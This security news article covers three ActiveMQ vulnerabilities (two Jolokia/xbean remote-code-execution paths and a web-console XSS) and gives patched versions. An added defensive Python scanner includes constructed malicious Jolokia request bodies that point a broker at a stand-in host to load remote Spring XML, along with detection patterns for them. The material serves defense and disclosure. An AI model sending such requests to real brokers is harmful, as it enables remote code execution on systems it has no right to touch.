Triple Threat: Apache ActiveMQ Vulnerabilities Expose Enterprises to RCE and XSS

Apache ActiveMQ, one of the most widely deployed open-source message brokers, is facing a set of security flaws that the Apache Software Foundation rates "Important". As a cornerstone of enterprise middleware, ActiveMQ brokers messages between clients written in a wide range of languages and platforms, including Java, JavaScript, C++, Python, and .NET. Three newly disclosed vulnerabilities, CVE-2026-41044, CVE-2026-40466, and CVE-2026-41043, now threaten to turn that connectivity against its users.

If successfully exploited, two of these flaws let an authenticated attacker escalate from routine message management to full Remote Code Execution (RCE) on the broker's JVM; the third is a cross-site scripting bug in the web console.

The two most severe vulnerabilities center on the Jolokia JMX-over-HTTP management interface and its interaction with the Spring Framework, which ActiveMQ uses to load broker configuration.

CVE-2026-41044 allows an authenticated attacker to bypass broker name validation in the admin web console. By setting a malicious broker name that embeds an xbean: binding, the attacker plants a trap: when a VM transport is later created via the Destination View MBean, the transport URI references this name, and the xbean: binding causes the broker to load a remote Spring XML application context.

CVE-2026-40466 is a follow-up in which researchers found a way around the earlier fix. Using Jolokia to add a connector backed by an HTTP discovery transport, an attacker can point the broker at an HTTP endpoint under their control. That endpoint returns a VM transport URI that triggers the same remote Spring XML loading path.

In both cases, the result is identical: “Because Spring’s ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker’s JVM through bean factory methods such as Runtime.exec().”
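As an added illustration (not code from this page, the advisories, or the ActiveMQ project), the Python below shows two defensive checks that follow from the mechanics described above: a strict allow-list for broker names, so that a name can never smuggle an xbean: binding into the vm://&lt;brokerName&gt; transport the broker opens internally, and a scanner over Jolokia POST bodies that flags exec requests which add a connector pointed at an HTTP endpoint or carry an xbean: binding in any argument. The allow-list pattern, the finding codes, and the sample request bodies are this example's own assumptions; only the Jolokia JSON request layout and the org.apache.activemq MBean naming follow the real tools.

```python
"""Added example: defensive checks for the ActiveMQ Jolokia/xbean issues.

1. validate_broker_name() rejects broker names that could carry a URI
   scheme, query string or option list into a vm://<brokerName> transport.
2. inspect_jolokia_request() flags Jolokia "exec" requests that add a
   connector pointed at an HTTP endpoint or that contain an xbean: binding.
All sample bodies below are constructed for this example.
"""
import json
import re

# A broker name is only ever an identifier. The allow-list is this
# example's assumption, not ActiveMQ's own validation rule.
BROKER_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")

XBEAN_RE = re.compile(r"xbean:", re.IGNORECASE)
HTTP_URL_RE = re.compile(r"https?://", re.IGNORECASE)
CONNECTOR_OP_RE = re.compile(r"connector", re.IGNORECASE)


def validate_broker_name(name: str) -> bool:
    """True only for plain identifiers; 'xbean:...' style names are rejected."""
    return bool(BROKER_NAME_RE.match(name))


def _strings_in(value):
    """Yield every string nested inside a parsed JSON value."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from _strings_in(v)
    elif isinstance(value, list):
        for v in value:
            yield from _strings_in(v)


def inspect_jolokia_request(req: dict) -> list:
    """Return finding codes for one Jolokia request object (empty if clean)."""
    findings = []
    if req.get("type") != "exec":
        return findings  # read/list/search requests cannot add connectors
    operation = req.get("operation", "")
    mbean = req.get("mbean", "")
    args = list(_strings_in(req.get("arguments", [])))

    if any(XBEAN_RE.search(s) for s in args + [mbean]):
        findings.append("xbean-binding")  # remote Spring XML load path
    if CONNECTOR_OP_RE.search(operation) and any(HTTP_URL_RE.search(s) for s in args):
        findings.append("connector-http-discovery")  # broker pointed at an HTTP endpoint
    if any(s.lower().startswith("vm://") for s in args):
        findings.append("vm-transport-arg")  # a VM transport handed in over JMX
    return findings


def scan_bodies(bodies) -> dict:
    """Parse raw Jolokia POST bodies (single object or bulk array) and
    return {body_index: findings} for every body that raised a finding."""
    results = {}
    for i, raw in enumerate(bodies):
        parsed = json.loads(raw)
        requests = parsed if isinstance(parsed, list) else [parsed]
        flagged = [f for r in requests for f in inspect_jolokia_request(r)]
        if flagged:
            results[i] = flagged
    return results


# Constructed sample bodies in Jolokia's request format; 203.0.113.0/24 is
# documentation address space, and the operation names are illustrative.
SAMPLE_BODIES = [
    # 0: routine monitoring read, benign
    '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost,'
    'destinationType=Queue,destinationName=orders","attribute":"QueueSize"}',
    # 1: connector added through an HTTP discovery transport
    '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addConnector(java.lang.String)",'
    '"arguments":["discovery:(http://203.0.113.10/agents)"]}',
    # 2: bulk request whose VM transport URI carries an xbean binding
    '[{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addNetworkConnector(java.lang.String)",'
    '"arguments":["vm://xbean:http://203.0.113.10/ctx.xml"]}]',
]

if __name__ == "__main__":
    for name in ("localhost", "xbean:http://203.0.113.10/ctx.xml", "prod?opt=1"):
        print(f"{name!r:45} valid={validate_broker_name(name)}")
    for idx, findings in scan_bodies(SAMPLE_BODIES).items():
        print(f"body {idx}: {findings}")
```

The scanner is meant to run over captured request bodies from the Jolokia endpoint (or a reverse proxy in front of it); the `vm-transport-arg` code is informational on its own, while `xbean-binding` and `connector-http-discovery` match the two RCE paths described above and should be treated as incidents on an unpatched broker.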

The third of the three vulnerabilities is a Cross-Site Scripting (XSS) flaw in the ActiveMQ Web Console. An authenticated attacker can inject HTML into a JMS selector field and, by overriding the content type to HTML instead of the expected XML, force the console to render the injected script when an administrator browses the queues. This can lead to session hijacking or further administrative compromise.

The Apache Software Foundation has released patches to address these vulnerabilities across both the 5.x and 6.x branches.

Affected Component   Vulnerable Versions   Required Patch
Apache ActiveMQ      before 5.19.6         5.19.6
Apache ActiveMQ      6.0.0 to 6.2.4        6.2.5
